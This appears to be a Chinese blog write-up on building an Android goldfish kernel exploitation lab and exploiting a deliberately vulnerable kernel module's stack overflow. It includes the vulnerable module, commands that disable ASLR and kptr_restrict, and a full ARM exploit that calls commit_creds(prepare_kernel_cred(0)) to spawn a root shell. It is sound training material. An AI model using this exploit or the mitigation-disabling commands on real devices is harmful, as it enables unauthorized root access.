android kernel | 环境搭建 + 第一次尝试

搭建环境过于艰辛,做个记录....

环境搭建

  • 内核代码下载
    • git clone https://aosp.tuna.tsinghua.edu.cn/kernel/goldfish.git
  • 漏洞项目代码下载
    • git clone https://github.com/Fuzion24/AndroidKernelExploitationPlayground.git kernel_exploit_challenges
  • 内核编译 和 准备工作:
    • 准备 | 将 漏洞模块 编译进内核

      cd goldfish && git checkout -t origin/android-goldfish-3.4 &&
      git am --signoff < ../kernel_exploit_challenges/kernel_build/debug_symbols_and_challenges.patch &&
      cd .. && ln -s $(pwd)/kernel_exploit_challenges/ goldfish/drivers/vulnerabilities

    • 准备编译工具
      • 下载 arm-linux-androideabi-4.6.tar.bz2
      • tar xvf arm-linux-androideabi-4.6.tar.bz2
      • export PATH=(pwd)/arm-linux-androideabi-4.6/bin/:PATH | 推荐将指令加入 〜/ .bashrc 一劳永逸
    • 编译指令(在 goldfish 目录下)
      • make goldfish_armv7_defconfig && make -j8
  • 安卓环境准备
    • 安卓sdk
    • 解压 : tar xvf android-sdk_r24.4.1-linux.tgz
    • 加入环境变量 : export PATH=/home/haclh/hacktools/android-sdk-linux/tools:$PATH
    • 下载jdk
      • 新开一个 shell , 运行 android (需要在加入环境变量步骤后使用)
      • 下载下图中指定的jdk


        image.png
      • 下载后通过 android list targets 指令可以查看所有下载的 镜像文件


        image.png
    • 创建模拟器
      • android create avd --force -t "android-19" -n kernel_challenges
  • 使用内核运行模拟器
    • emulator -show-kernel -kernel arch/arm/boot/zImage -avd kernel_challenges -no-boot-anim -no-skin -no-audio -no-window -qemu -monitor unix:/tmp/qemuSocket,server,nowait -s
  • android 动态调试 (goldfish 目录下运行如下指令)
    • arm-linux-androideabi-gdb vmlinux

第一次尝试 | 内核栈溢出提权

  • 首先看看漏洞代码, kernel_exploit_challenges / challenge / stack_buffer_overflow / module / stack_buffer_overflow.c :
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/proc_fs.h>
#include <linux/string.h>
#include <asm/uaccess.h>
#define MAX_LENGTH 64
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Ryan Welton");
MODULE_DESCRIPTION("Stack Buffer Overflow Example");
static struct proc_dir_entry *stack_buffer_proc_entry;
int proc_entry_write(struct file *file, const char __user *ubuf, unsigned long count, void *data)
{
    char buf[MAX_LENGTH];
    if (copy_from_user(&buf, ubuf, count)) {
        printk(KERN_INFO "stackBufferProcEntry: error copying data from userspacen");
        return -EFAULT;
    }
    return count;
}
static int __init stack_buffer_proc_init(void)
{
    stack_buffer_proc_entry = create_proc_entry("stack_buffer_overflow", 0666, NULL);
    stack_buffer_proc_entry->write_proc = proc_entry_write;
    printk(KERN_INFO "created /proc/stack_buffer_overflown");
    return 0;
}
static void __exit stack_buffer_proc_exit(void)
{
    if (stack_buffer_proc_entry) {
        remove_proc_entry("stack_buffer_overflow", stack_buffer_proc_entry);
    }
    printk(KERN_INFO "vuln_stack_proc_entry removedn");
}
module_init(stack_buffer_proc_init);
module_exit(stack_buffer_proc_exit);
  • 相关知识点

    • 提权基础
      • 用户态 | 内核态 区别 (EL1 | EL0 权限等级)
      • 提权思路 : 利用 EL1 权限下可以执行EL0 级别的操作中的漏洞 , 在EL0 级别的操作过程中做到命令执行 , 提升用户等级 , 并反弹shell , 从而做到普通用户到 root 的提权 | 描述方式需要修改。。。
    • 驱动编程 | 在这次利用过程中必要的知识
      • 注册驱动 | module_init , open 时调用
      • stack_buffer_proc_entry->write_proc | 当对这个设备写入时 , 会调用 write_proc 对应的函数
      • copy_from_user(&buf,ubuf,count) 从用户空间拷贝数据到buf
    • 回到用户态:
      • 下面就是要回到用户态,在x86平台有iret指令可以回到用户态,在arm下返回用户态就更简单了。在arm下cpsr寄存器的M [4: 0]位用来表示处理器的运行模式,具体可以看这个。所以我们把cpsr寄存器的M [4:0]位设置为10000后就表示处理器进入了用户模式。
  • 漏洞点 :

    • proc_entry_write 没有对输入长度或字符内容做限制,造成栈溢出
  • 这次可能遇到的相关缓解措施 及其缓解手段

    • ASLR
      • 堆栈地址随机化 , 意味着shellcode地址需要动态调整
      • 关闭方式 : echo 0 > proc/sys/kernel/randomize_va_space
    • kptr_restrict
      • 内核层 的 pie | 动态加载 内核符号
      • /proc/kallsyms文件中保存着所有的内核符号的名称和它在内存中的位置
      • 关闭方式 : echo 0 > proc/sys/kernel/kptr_restrict
      • 相关作用 : 获取 commit_creds 和 prepare_kernel_cred 符号的地址,用来提权时使用
  • 具体的利用思路:
    - 1.调用 commit_creds(prepare_kernel_cred(0)) 提升权限
    - 2.调用 mov r3,#0x40000010; MSR CPSR_c,R3; 设置 cpsr 寄存器, 使cpu进入用户模式
    - 3.然后执行 execl(“/ system / bin / sh”,“sh”,NULL); 起一个 root 权限的 shell

  • EXP:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#define MAX             68
int open_file(void)
{
        int fd = open("/proc/stack_buffer_overflow", O_RDWR);
        if (fd == -1)
                err(1, "open");
        return fd;
}
void payload(void)
{
                printf("[+] enjoy the shelln");
                execl("/system/bin/sh", "sh", NULL);
}
extern uint32_t shellCode[];
asm
(
"    .text\n"
"    .align 2\n"
"    .code 32\n"
"    .globl shellCode\n\t"
"shellCode:\n\t"
// commit_creds(prepare_kernel_cred(0));
// -> get root
"LDR     R3, =0xc0039d34\n\t"   //prepare_kernel_cred addr
"MOV     R0, #0\n\t"
"BLX     R3\n\t"
"LDR     R3, =0xc0039834\n\t"   //commit_creds addr
"BLX     R3\n\t"
"mov r3, #0x40000010\n\t"
"MSR    CPSR_c,R3\n\t"
"LDR     R3, =0x826d\n\t"     // payload function addr
"BLX     R3\n\t"
);
void trigger_vuln(int fd)
{
        #define MAX_PAYLOAD (MAX + 4)
        char buf[MAX_PAYLOAD];
        memset(buf, 'A', sizeof(buf));

        void * pc = buf + MAX;
        *(void **)pc  = (void *) shellCode;   //ret addr
        /* Kaboom! */

        write(fd, buf, MAX_PAYLOAD );
}

int main(void)
{
        int fd;
        printf("shellcdoe addr: %p\n", shellCode);
        printf("payload:%p\n", payload);
        fd = open_file();
        trigger_vuln(fd);
        close(fd);
}
  • tip :在本地测试会遇到的坑点
      1. 本次测试的漏洞时 栈溢出 , 可能在本地环境偏移不同
      1. payload 加载地址变化
      1. Illegal instruction | 非法指令 , 此报错执行exp 未进入内核态的操作.
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 194,390评论 5 459
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 81,821评论 2 371
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 141,632评论 0 319
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 52,170评论 1 263
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 61,033评论 4 355
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 46,098评论 1 272
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 36,511评论 3 381
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 35,204评论 0 253
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 39,479评论 1 290
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 34,572评论 2 309
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 36,341评论 1 326
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 32,213评论 3 312
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 37,576评论 3 298
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 28,893评论 0 17
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,171评论 1 250
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 41,486评论 2 341
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 40,676评论 2 335

推荐阅读更多精彩内容